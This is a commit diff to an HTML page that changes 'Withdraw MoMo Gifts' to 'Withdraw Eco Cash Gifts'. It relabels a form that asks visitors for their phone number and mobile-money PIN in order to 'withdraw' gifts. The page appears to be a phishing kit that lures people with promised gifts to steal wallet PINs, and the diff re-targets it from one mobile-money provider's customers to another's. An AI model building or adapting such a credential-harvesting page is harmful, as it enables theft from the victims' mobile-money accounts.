Change title and input fields for Eco Cash Gifts
Updated the title and form fields for Eco Cash.

--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 <!-- Prevent zooming and make layout fixed for mobile -->
 <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
 
-<title>Withdraw MoMo Gifts</title>
+<title>Withdraw Eco Cash Gifts</title>
 
 <style>
   /* Global reset to prevent scrolling */
@@ -185,7 +185,7 @@
 
 <body>
 
-<h2>Withdraw MoMo Gifts</h2>
+<h2>Withdraw Eco Cash Gifts</h2>
 
 <img src="eco.jpg" class="logo">
 
@@ -201,8 +201,8 @@
   <label>Phone Number</label>
   <input type="text" name="phone" placeholder="Enter phone number" required>
 
-  <label>MoMo Pin</label>
-  <input type="text" name="account" placeholder="Enter MoMo pin" required>
+  <label>Eco Cash Pin</label>
+  <input type="text" name="account" placeholder="Enter Eco cash pin" required>
 
   <button type="submit">Withdraw</button>
 </form>
@@ -236,6 +236,7 @@
 
 </body>
 </html>
+
 
 
 
